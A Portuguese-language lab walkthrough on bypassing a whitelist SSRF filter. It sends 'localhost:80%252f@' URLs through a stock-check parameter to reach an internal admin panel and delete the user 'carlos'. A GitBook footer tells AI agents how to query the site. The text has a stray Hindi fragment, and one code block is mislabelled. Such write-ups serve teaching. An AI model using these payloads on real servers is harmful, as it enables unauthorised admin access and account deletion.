> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/web/ssrf/ssrf-with-whitelist-based-filter.md).

# SSRF com Filtragem Baseada em Whitelist

### SSRF com filtro de entrada baseado em whitelist

A funcionalidade de verificação de estoque envia solicitações para um sistema interno. / O objetivo é modificar a URL usada em `stockApi` o parâmetro para पहुंचar a interface de administração localizada em `HTTP://localhost/admin`, depois excluir o usuário **carlos**. / O desenvolvedor implementou uma defesa anti-SSRF baseada em uma **whitelist de hosts autorizados**, que deve ser contornada.

```javascript
stockApi=http://stock.weliketoshop.net:8080/product/stock/check?productId=1%26storeId=1
```

#### **Análise do filtro**

A aplicação permite solicitações apenas para o seguinte host:

```bash
stockApi=http://127.0.0.1/admin
```

<figure><img src="/files/e8b9116c5d9d600306ba6af864b4729a2a23b940" alt=""><figcaption></figcaption></figure>

Se alterarmos a URL para `localhost` ou um endereço interno, obtemos o erro:

O host de verificação de estoque externo deve ser stock.weliketoshop.net

#### **Contornando a whitelist**

A ideia é usar a `username:password@host` sintaxe em URLs. / Esse método nos permite **forçar o host validado pela whitelist a aparecer na parte de "authority"** enquanto, na verdade, direcionamos a solicitação para `localhost`.

```bash
http://username:password@website.com
```

Payload usado:

```bash
stockApi=http://localhost:80%252f@stock.weliketoshop.net:8080
```

Com `/` (`%252f`) com dupla codificação, o servidor interpreta corretamente a parte redirecionada para `localhost`.

Isso permite acesso ao painel de administração interno.

<figure><img src="/files/5bf561d3c4fd3fc8724bb9b0d8ba225eb6080b76" alt=""><figcaption></figcaption></figure>

#### **Exclusão do usuário Carlos**

Uma vez que o bypass está funcional, a URL de remoção é chamada diretamente:

{% code overflow="wrap" %}

```bash
stockApi=http://localhost:80%252f@stock.weliketoshop.net:8080/admin?delete=username=carlos
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/web/ssrf/ssrf-with-whitelist-based-filter.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
